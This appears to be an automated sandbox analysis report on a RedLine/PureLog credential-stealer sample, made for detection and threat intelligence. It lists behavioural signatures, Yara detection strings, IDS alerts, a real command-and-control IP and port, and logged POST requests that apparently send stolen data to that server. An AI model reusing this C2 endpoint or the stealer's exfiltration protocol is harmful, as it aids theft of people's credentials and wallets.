Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
lWnSA7IyVc.exe

Overview

General Information

Sample name:lWnSA7IyVc.exe
renamed because original name is a hash value
Original sample name:3726ee297e39481c17efbe020ef5cfcc.exe
Analysis ID:1567345
MD5:3726ee297e39481c17efbe020ef5cfcc
SHA1:905988b5b2601a21688bc002e79fad8855969d25
SHA256:7010f01eb61a3e6171cff3f45dffda217cab75fcd8e6055d37bb9976d1e8294f
Tags:exeRedLineStealeruser-abuse_ch
Infos:

Detection

PureLog Stealer, RedLine
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected PureLog Stealer
Yara detected RedLine Stealer
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Injects a PE file into a foreign processes
Machine Learning detection for sample
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
Uses known network protocols on non-standard ports
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • lWnSA7IyVc.exe (PID: 2008 cmdline: "C:\Users\user\Desktop\lWnSA7IyVc.exe" MD5: 3726EE297E39481C17EFBE020EF5CFCC)
    • lWnSA7IyVc.exe (PID: 3808 cmdline: "C:\Users\user\Desktop\lWnSA7IyVc.exe" MD5: 3726EE297E39481C17EFBE020EF5CFCC)
      • conhost.exe (PID: 1420 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
RedLine StealerRedLine Stealer is a malware available on underground forums for sale apparently as a standalone ($100/$150 depending on the version) or also on a subscription basis ($100/month). This malware harvests information from browsers such as saved credentials, autocomplete data, and credit card information. A system inventory is also taken when running on a target machine, to include details such as the username, location data, hardware configuration, and information regarding installed security software. More recent versions of RedLine added the ability to steal cryptocurrency. FTP and IM clients are also apparently targeted by this family, and this malware has the ability to upload and download files, execute commands, and periodically send back information about the infected computer.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.redline_stealer

Malware Configuration

Threatname: RedLine

{"C2 url": ["185.222.58.229:55615"], "Bot Id": "cheat"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_RedLine_1Yara detected RedLine StealerJoe Security
    dump.pcapJoeSecurity_RedLineYara detected RedLine StealerJoe Security

      Memory Dumps

      SourceRuleDescriptionAuthorStrings
      00000000.00000002.1687881526.00000000050E0000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
        00000000.00000002.1685222888.0000000003539000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          00000000.00000002.1685222888.0000000003539000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_RedLineYara detected RedLine StealerJoe Security
            00000000.00000002.1685222888.0000000003539000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_RedLineStealer_f54632ebunknownunknown
            • 0x2ca92:$a4: get_ScannedWallets
            • 0x2b8f0:$a5: get_ScanTelegram
            • 0x2c716:$a6: get_ScanGeckoBrowsersPaths
            • 0x2a532:$a7: <Processes>k__BackingField
            • 0x28444:$a8: <GetWindowsVersion>g__HKLM_GetString|11_0
            • 0x29e66:$a9: <ScanFTP>k__BackingField
            00000002.00000002.1868490775.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
              Click to see the 13 entries

              Unpacked PEs

              SourceRuleDescriptionAuthorStrings
              0.2.lWnSA7IyVc.exe.50e0000.4.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                0.2.lWnSA7IyVc.exe.50e0000.4.raw.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                  2.2.lWnSA7IyVc.exe.400000.0.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                    2.2.lWnSA7IyVc.exe.400000.0.unpackJoeSecurity_RedLineYara detected RedLine StealerJoe Security
                      2.2.lWnSA7IyVc.exe.400000.0.unpackWindows_Trojan_RedLineStealer_f54632ebunknownunknown
                      • 0x135ca:$a4: get_ScannedWallets
                      • 0x12428:$a5: get_ScanTelegram
                      • 0x1324e:$a6: get_ScanGeckoBrowsersPaths
                      • 0x1106a:$a7: <Processes>k__BackingField
                      • 0xef7c:$a8: <GetWindowsVersion>g__HKLM_GetString|11_0
                      • 0x1099e:$a9: <ScanFTP>k__BackingField
                      Click to see the 18 entries

                      Sigma Signatures

                      No Sigma rule has matched

                      Suricata Signatures

                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-12-03T13:27:07.671218+010020450001Malware Command and Control Activity Detected185.222.58.22955615192.168.2.449733TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-12-03T13:27:12.660613+010020450011Malware Command and Control Activity Detected185.222.58.22955615192.168.2.449733TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-12-03T13:27:02.233306+010028496621Malware Command and Control Activity Detected192.168.2.449733185.222.58.22955615TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-12-03T13:27:08.330742+010028493511Malware Command and Control Activity Detected192.168.2.449733185.222.58.22955615TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-12-03T13:27:16.296702+010028482001Malware Command and Control Activity Detected192.168.2.449739185.222.58.22955615TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-12-03T13:27:13.296696+010028493521Malware Command and Control Activity Detected192.168.2.449737185.222.58.22955615TCP

                      Joe Sandbox Signatures

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection

                      barindex
                      Antivirus / Scanner detection for submitted sample
                      Source: lWnSA7IyVc.exeAvira: detected
                      Found malware configuration
                      Source: 2.2.lWnSA7IyVc.exe.400000.0.unpackMalware Configuration Extractor: RedLine {"C2 url": ["185.222.58.229:55615"], "Bot Id": "cheat"}
                      Multi AV Scanner detection for submitted file
                      Source: lWnSA7IyVc.exeReversingLabs: Detection: 68%
                      AI detected suspicious sample
                      Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                      Machine Learning detection for sample
                      Source: lWnSA7IyVc.exeJoe Sandbox ML: detected
                      Source: lWnSA7IyVc.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                      Source: lWnSA7IyVc.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeCode function: 4x nop then jmp 069AB94Dh0_2_069AAF5D

                      Networking

                      barindex
                      Suricata IDS alerts for network traffic
                      Source: Network trafficSuricata IDS: 2849662 - Severity 1 - ETPRO MALWARE RedLine - CheckConnect Request : 192.168.2.4:49733 -> 185.222.58.229:55615
                      Source: Network trafficSuricata IDS: 2045000 - Severity 1 - ET MALWARE RedLine Stealer - CheckConnect Response : 185.222.58.229:55615 -> 192.168.2.4:49733
                      Source: Network trafficSuricata IDS: 2849351 - Severity 1 - ETPRO MALWARE RedLine - EnvironmentSettings Request : 192.168.2.4:49733 -> 185.222.58.229:55615
                      Source: Network trafficSuricata IDS: 2045001 - Severity 1 - ET MALWARE Win32/LeftHook Stealer Browser Extension Config Inbound : 185.222.58.229:55615 -> 192.168.2.4:49733
                      Source: Network trafficSuricata IDS: 2849352 - Severity 1 - ETPRO MALWARE RedLine - SetEnvironment Request : 192.168.2.4:49737 -> 185.222.58.229:55615
                      Source: Network trafficSuricata IDS: 2848200 - Severity 1 - ETPRO MALWARE RedLine - GetUpdates Request : 192.168.2.4:49739 -> 185.222.58.229:55615
                      C2 URLs / IPs found in malware configuration
                      Source: Malware configuration extractorURLs: 185.222.58.229:55615
                      Uses known network protocols on non-standard ports
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 55615
                      Source: unknownNetwork traffic detected: HTTP traffic on port 55615 -> 49733
                      Source: unknownNetwork traffic detected: HTTP traffic on port 55615 -> 49733
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 55615
                      Source: unknownNetwork traffic detected: HTTP traffic on port 55615 -> 49733
                      Source: unknownNetwork traffic detected: HTTP traffic on port 55615 -> 49733
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 55615
                      Source: unknownNetwork traffic detected: HTTP traffic on port 55615 -> 49737
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 55615
                      Source: unknownNetwork traffic detected: HTTP traffic on port 55615 -> 49739
                      Source: global trafficTCP traffic: 192.168.2.4:49733 -> 185.222.58.229:55615
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"Host: 185.222.58.229:55615Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/EnvironmentSettings"Host: 185.222.58.229:55615Content-Length: 144Expect: 100-continueAccept-Encoding: gzip, deflate
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/SetEnvironment"Host: 185.222.58.229:55615Content-Length: 956493Expect: 100-continueAccept-Encoding: gzip, deflate
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetUpdates"Host: 185.222.58.229:55615Content-Length: 956485Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive
                      Source: Joe Sandbox ViewASN Name: ROOTLAYERNETNL ROOTLAYERNETNL
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.229
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.229
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.229
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.229
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.229
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.229
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.229
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.229
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.229
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.229
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.229
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.229
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.229
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.229
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.229
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.229
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.229
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.229
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.229
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.229
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.229
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.229
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.229
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.229
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.229
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.229
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.229
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.229
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.229
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.229
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.229
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.229
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.229
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.229
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.229
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.229
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.229
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.229
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.229
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.229
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.229
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.229
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.229
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.229
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.229
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.229
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.229
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.229
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.229
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.229
                      Source: global trafficDNS traffic detected: DNS query: api.ip.sb
                      Source: unknownHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"Host: 185.222.58.229:55615Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive
                      Source: lWnSA7IyVc.exe, 00000002.00000002.1869963112.0000000003461000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.222.58.229:
                      Source: lWnSA7IyVc.exe, 00000002.00000002.1869963112.0000000003453000.00000004.00000800.00020000.00000000.sdmp, lWnSA7IyVc.exe, 00000002.00000002.1869963112.00000000032B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.222.58.229:55615
                      Source: lWnSA7IyVc.exe, 00000002.00000002.1869963112.00000000032B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.222.58.229:55615/
                      Source: lWnSA7IyVc.exe, 00000002.00000002.1869963112.0000000003453000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.222.58.229:55615t-
                      Source: lWnSA7IyVc.exe, 00000002.00000002.1869963112.0000000003413000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.datacontract.org/2004/07/
                      Source: lWnSA7IyVc.exe, 00000002.00000002.1869963112.00000000032B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/actor/next
                      Source: lWnSA7IyVc.exe, 00000002.00000002.1869963112.00000000032B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
                      Source: lWnSA7IyVc.exe, 00000002.00000002.1869963112.00000000032B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing
                      Source: lWnSA7IyVc.exe, 00000002.00000002.1869963112.00000000032B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/faultX
                      Source: lWnSA7IyVc.exe, 00000002.00000002.1869963112.00000000032B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
                      Source: lWnSA7IyVc.exe, 00000002.00000002.1869963112.00000000032B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                      Source: lWnSA7IyVc.exe, 00000002.00000002.1869963112.00000000032B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/
                      Source: lWnSA7IyVc.exe, 00000002.00000002.1869963112.00000000032B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/0
                      Source: lWnSA7IyVc.exe, 00000002.00000002.1869963112.00000000032B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/CheckConnect
                      Source: lWnSA7IyVc.exe, 00000002.00000002.1869963112.00000000032B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/CheckConnectResponse
                      Source: lWnSA7IyVc.exe, 00000002.00000002.1869963112.0000000003300000.00000004.00000800.00020000.00000000.sdmp, lWnSA7IyVc.exe, 00000002.00000002.1869963112.00000000032B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/EnvironmentSettings
                      Source: lWnSA7IyVc.exe, 00000002.00000002.1869963112.00000000032B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/EnvironmentSettingsResponse
                      Source: lWnSA7IyVc.exe, 00000002.00000002.1869963112.0000000003453000.00000004.00000800.00020000.00000000.sdmp, lWnSA7IyVc.exe, 00000002.00000002.1869963112.00000000032B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/GetUpdates
                      Source: lWnSA7IyVc.exe, 00000002.00000002.1869963112.00000000032B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/GetUpdatesResponse
                      Source: lWnSA7IyVc.exe, 00000002.00000002.1869963112.0000000003461000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/SetEnviron
                      Source: lWnSA7IyVc.exe, 00000002.00000002.1869963112.0000000003461000.00000004.00000800.00020000.00000000.sdmp, lWnSA7IyVc.exe, 00000002.00000002.1869963112.00000000032B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/SetEnvironment
                      Source: lWnSA7IyVc.exe, 00000002.00000002.1869963112.00000000032B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/SetEnvironmentResponse
                      Source: lWnSA7IyVc.exe, 00000002.00000002.1869963112.00000000032B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/VerifyUpdate
                      Source: lWnSA7IyVc.exe, 00000002.00000002.1869963112.00000000032B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/VerifyUpdateResponse
                      Source: lWnSA7IyVc.exe, 00000000.00000002.1688375389.00000000069D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                      Source: lWnSA7IyVc.exe, 00000000.00000002.1688375389.00000000069D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.coml
                      Source: lWnSA7IyVc.exe, 00000000.00000002.1688375389.00000000069D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com
                      Source: lWnSA7IyVc.exe, 00000000.00000002.1688375389.00000000069D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers
                      Source: lWnSA7IyVc.exe, 00000000.00000002.1688375389.00000000069D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
                      Source: lWnSA7IyVc.exe, 00000000.00000002.1688375389.00000000069D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
                      Source: lWnSA7IyVc.exe, 00000000.00000002.1688375389.00000000069D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
                      Source: lWnSA7IyVc.exe, 00000000.00000002.1688375389.00000000069D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
                      Source: lWnSA7IyVc.exe, 00000000.00000002.1688375389.00000000069D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
                      Source: lWnSA7IyVc.exe, 00000000.00000002.1688375389.00000000069D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
                      Source: lWnSA7IyVc.exe, 00000000.00000002.1688375389.00000000069D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.com
                      Source: lWnSA7IyVc.exe, 00000000.00000002.1688375389.00000000069D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn
                      Source: lWnSA7IyVc.exe, 00000000.00000002.1688375389.00000000069D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
                      Source: lWnSA7IyVc.exe, 00000000.00000002.1688375389.00000000069D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
                      Source: lWnSA7IyVc.exe, 00000000.00000002.1688375389.00000000069D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
                      Source: lWnSA7IyVc.exe, 00000000.00000002.1688375389.00000000069D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
                      Source: lWnSA7IyVc.exe, 00000000.00000002.1688375389.00000000069D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.goodfont.co.kr
                      Source: lWnSA7IyVc.exe, 00000000.00000002.1688375389.00000000069D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
                      Source: lWnSA7IyVc.exe, 00000000.00000002.1688375389.00000000069D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com
                      Source: lWnSA7IyVc.exe, 00000000.00000002.1688375389.00000000069D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.com
                      Source: lWnSA7IyVc.exe, 00000000.00000002.1688375389.00000000069D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.kr
                      Source: lWnSA7IyVc.exe, 00000000.00000002.1688375389.00000000069D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com
                      Source: lWnSA7IyVc.exe, 00000000.00000002.1688375389.00000000069D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.typography.netD
                      Source: lWnSA7IyVc.exe, 00000000.00000002.1688375389.00000000069D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deDPlease
                      Source: lWnSA7IyVc.exe, 00000000.00000002.1688375389.00000000069D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
                      Source: tmp7D35.tmp.2.dr, tmp4321.tmp.2.dr, tmp4310.tmp.2.dr, tmp7D24.tmp.2.dr, tmp7CF2.tmp.2.dr, tmp42FF.tmp.2.dr, tmp7D02.tmp.2.dr, tmp7D14.tmp.2.dr, tmp4322.tmp.2.dr, tmp4332.tmp.2.dr, tmp4333.tmp.2.dr, tmp7D13.tmp.2.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                      Source: lWnSA7IyVc.exe, 00000002.00000002.1869963112.0000000003300000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ip.sb
                      Source: lWnSA7IyVc.exe, 00000002.00000002.1869963112.0000000003300000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ip.sb/geoip
                      Source: lWnSA7IyVc.exe, lWnSA7IyVc.exe, 00000002.00000002.1868490775.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://api.ip.sb/geoip%USERPEnvironmentROFILE%
                      Source: lWnSA7IyVc.exe, lWnSA7IyVc.exe, 00000002.00000002.1868490775.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.orgcookies//settinString.Removeg
                      Source: lWnSA7IyVc.exeString found in binary or memory: https://api.particle.io/v1/devices/13300350003473433373737385/digitalread?access_token=Q235ad2c91cac
                      Source: tmp7D35.tmp.2.dr, tmp4321.tmp.2.dr, tmp4310.tmp.2.dr, tmp7D24.tmp.2.dr, tmp7CF2.tmp.2.dr, tmp42FF.tmp.2.dr, tmp7D02.tmp.2.dr, tmp7D14.tmp.2.dr, tmp4322.tmp.2.dr, tmp4332.tmp.2.dr, tmp4333.tmp.2.dr, tmp7D13.tmp.2.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                      Source: tmp7D35.tmp.2.dr, tmp4321.tmp.2.dr, tmp4310.tmp.2.dr, tmp7D24.tmp.2.dr, tmp7CF2.tmp.2.dr, tmp42FF.tmp.2.dr, tmp7D02.tmp.2.dr, tmp7D14.tmp.2.dr, tmp4322.tmp.2.dr, tmp4332.tmp.2.dr, tmp4333.tmp.2.dr, tmp7D13.tmp.2.drString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                      Source: tmp7D35.tmp.2.dr, tmp4321.tmp.2.dr, tmp4310.tmp.2.dr, tmp7D24.tmp.2.dr, tmp7CF2.tmp.2.dr, tmp42FF.tmp.2.dr, tmp7D02.tmp.2.dr, tmp7D14.tmp.2.dr, tmp4322.tmp.2.dr, tmp4332.tmp.2.dr, tmp4333.tmp.2.dr, tmp7D13.tmp.2.drString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                      Source: tmp7D35.tmp.2.dr, tmp4321.tmp.2.dr, tmp4310.tmp.2.dr, tmp7D24.tmp.2.dr, tmp7CF2.tmp.2.dr, tmp42FF.tmp.2.dr, tmp7D02.tmp.2.dr, tmp7D14.tmp.2.dr, tmp4322.tmp.2.dr, tmp4332.tmp.2.dr, tmp4333.tmp.2.dr, tmp7D13.tmp.2.drString found in binary or memory: https://duckduckgo.com/ac/?q=
                      Source: tmp7D35.tmp.2.dr, tmp4321.tmp.2.dr, tmp4310.tmp.2.dr, tmp7D24.tmp.2.dr, tmp7CF2.tmp.2.dr, tmp42FF.tmp.2.dr, tmp7D02.tmp.2.dr, tmp7D14.tmp.2.dr, tmp4322.tmp.2.dr, tmp4332.tmp.2.dr, tmp4333.tmp.2.dr, tmp7D13.tmp.2.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
                      Source: tmp7D35.tmp.2.dr, tmp4321.tmp.2.dr, tmp4310.tmp.2.dr, tmp7D24.tmp.2.dr, tmp7CF2.tmp.2.dr, tmp42FF.tmp.2.dr, tmp7D02.tmp.2.dr, tmp7D14.tmp.2.dr, tmp4322.tmp.2.dr, tmp4332.tmp.2.dr, tmp4333.tmp.2.dr, tmp7D13.tmp.2.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                      Source: lWnSA7IyVc.exe, lWnSA7IyVc.exe, 00000002.00000002.1868490775.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://ipinfo.io/ip%appdata%
                      Source: tmp7D35.tmp.2.dr, tmp4321.tmp.2.dr, tmp4310.tmp.2.dr, tmp7D24.tmp.2.dr, tmp7CF2.tmp.2.dr, tmp42FF.tmp.2.dr, tmp7D02.tmp.2.dr, tmp7D14.tmp.2.dr, tmp4322.tmp.2.dr, tmp4332.tmp.2.dr, tmp4333.tmp.2.dr, tmp7D13.tmp.2.drString found in binary or memory: https://www.ecosia.org/newtab/
                      Source: tmp7D35.tmp.2.dr, tmp4321.tmp.2.dr, tmp4310.tmp.2.dr, tmp7D24.tmp.2.dr, tmp7CF2.tmp.2.dr, tmp42FF.tmp.2.dr, tmp7D02.tmp.2.dr, tmp7D14.tmp.2.dr, tmp4322.tmp.2.dr, tmp4332.tmp.2.dr, tmp4333.tmp.2.dr, tmp7D13.tmp.2.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico

                      System Summary

                      barindex
                      Malicious sample detected (through community Yara rule)
                      Source: 2.2.lWnSA7IyVc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                      Source: 2.2.lWnSA7IyVc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
